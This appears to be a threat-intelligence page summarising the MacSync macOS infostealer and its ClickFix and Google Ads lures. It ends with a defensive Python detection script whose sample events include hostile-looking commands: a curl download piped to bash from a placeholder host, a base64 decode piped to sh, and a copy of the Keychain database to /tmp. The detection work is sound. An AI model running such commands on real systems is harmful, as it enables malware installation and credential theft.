
MacSync macOS infostealer with dynamic AppleScript and in-memory execution

Malware Activity
2 unique sources, 2 articles

Summary


The MacSync macOS infostealer now uses dynamic AppleScript payloads and in-memory execution to reduce static detection and complicate response. It is being delivered through ClickFix lures that trick users into running terminal commands, increasing the risk of theft on macOS systems. The malware can steal credentials, files, keychain databases, and crypto-wallet seed phrases, making the latest variant especially risky for high-value users.

Related Happenings

SHub Reaper macOS infostealer variant

Malware Activity
First: 19.05.2026 00:42 Last: 19.05.2026 00:42 Sources 1

About this happening: The **SHub Reaper** macOS infostealer now uses **AppleScript** and a fake **Apple security update** lure to infect Macs, raising the risk of credential theft and remote access. It...

ClickFix attacks with PySoxy scheduled-task persistence

Malware Activity
First: 12.05.2026 15:00 Last: 12.05.2026 15:00 Sources 1

About this happening: Cybercriminals are combining **ClickFix** with **PySoxy** to preserve access on victim machines, letting activity restart even after removal attempts. The setup uses a **Python SO...

Vidar Stealer ClickFix campaign targeting multiple sectors

Campaign
First: 08.05.2026 14:00 Last: 08.05.2026 14:00 Sources 1

About this happening: The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...

ACSC ClickFix mitigation guidance for Vidar Stealer

Advisory/Mitigation
First: 07.05.2026 21:00 Last: 07.05.2026 21:00 Sources 1

About this happening: The **ACSC** issued mitigation guidance for an **ongoing ClickFix campaign** that is pushing **Vidar Stealer** through **malicious PowerShell commands**, increasing credential-the...

MacOS living-off-the-land analysis exposing native-feature abuse

Technical Analysis
First: 22.04.2026 19:30 Last: 22.04.2026 19:30 Sources 1

About this happening: Native macOS features are now being repurposed for **code execution**, **lateral movement**, and **evasion**, widening detection gaps across enterprise Apple fleets. The analysis...

Timeline

  1. 10.05.2026 20:52 1 article · 17d ago

    MacSync campaign abuses Google Ads and Claude.ai chats

    Campaign Scope Update

    A MacSync macOS infostealer campaign is abusing Google Ads and legitimate Claude.ai shared chats to lure users searching for "Claude mac download" into following Terminal instructions that download and run malware on their Mac. One observed variant uses polymorphic delivery, checks for Russian or CIS-region keyboard input sources and sends a cis_blocked ping before exiting, then profiles the victim with external IP address, hostname, OS version, and keyboard locale before using osascript to run a second-stage payload; another variant skips profiling and exfiltrates browser credentials, cookies, and macOS Keychain contents.

  2. 16.03.2026 13:41 2 articles · 2mo ago

    MacSync macOS infostealer with dynamic AppleScript and in-memory execution

    Initial Disclosure

    MacSync was first pushed through **ClickFix** lures that used fake install flows and Terminal commands to make victims run the payload. The latest phase adds **dynamic AppleScript** and **in-memory execution**, strengthening evasion while preserving theft of sensitive macOS data.

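The delivery chain described in the timeline (victim pastes a Terminal command, the command fetches and runs a payload, osascript runs a second stage, the host's keyboard input sources and Keychain are touched) can be turned into endpoint detection logic. The following is an added example, not code from the page or from any vendor: it runs a few heuristics over constructed process-execution events of the shape an EDR or macOS Endpoint Security client would record; the process names, the placeholder URL and the indicator labels are assumptions.

```python
"""Heuristics for ClickFix-style terminal abuse in macOS process events (constructed example)."""
import re
from dataclasses import dataclass

# ClickFix relies on the victim pasting commands into a terminal, so the noisy
# "download and run" patterns are scoped to children of interactive shells.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "zsh", "bash", "sh"}

PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b")
DECODE_TO_SHELL = re.compile(r"\bbase64\s+(?:-d|-D|--decode)[^|]*\|\s*(?:ba|z)?sh\b")
INLINE_OSASCRIPT = re.compile(r"\bosascript\b.*\s-e\s")  # AppleScript passed inline, nothing on disk

@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent process name
    image: str    # executed image name
    cmdline: str  # full command line

def clickfix_indicators(ev: ProcEvent) -> list[str]:
    """Return the indicator names that fire for one event (empty list if none)."""
    hits = []
    if ev.parent in INTERACTIVE_PARENTS:
        if PIPE_TO_SHELL.search(ev.cmdline):
            hits.append("curl-piped-to-shell")
        if DECODE_TO_SHELL.search(ev.cmdline):
            hits.append("base64-decoded-to-shell")
        if INLINE_OSASCRIPT.search(ev.cmdline):
            hits.append("inline-osascript")
    # Profiling and theft targets named in the writeup are flagged regardless of parent.
    if ev.image == "defaults" and "com.apple.HIToolbox" in ev.cmdline:
        hits.append("keyboard-locale-probe")  # input-source check before the payload runs
    if "login.keychain-db" in ev.cmdline:
        hits.append("keychain-db-access")     # Keychain database being read or copied
    return hits

def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> indicators, keeping only events that fired something."""
    return {i: h for i, ev in enumerate(events) if (h := clickfix_indicators(ev))}

# Constructed sample events; https://example.invalid is a placeholder, not a real host.
SAMPLE_EVENTS = [
    ProcEvent("Terminal", "bash", 'bash -c "curl -fsSL https://example.invalid/i.sh | bash"'),
    ProcEvent("bash", "osascript", "osascript -e 'do shell script \"id\"'"),
    ProcEvent("Terminal", "zsh", "echo aWQ= | base64 -d | sh"),
    ProcEvent("launchd", "osascript", "osascript -e 'display dialog \"hi\"'"),  # not user-typed
    ProcEvent("zsh", "defaults", "defaults read com.apple.HIToolbox AppleSelectedInputSources"),
    ProcEvent("zsh", "cp", "cp ~/Library/Keychains/login.keychain-db /tmp/k"),
    ProcEvent("Terminal", "ls", "ls -la"),
]
```

Events 0, 1, 2, 4 and 5 fire exactly one indicator each; the launchd-spawned osascript (event 3) is deliberately out of scope here because it is not a user-typed command, and would need its own rule.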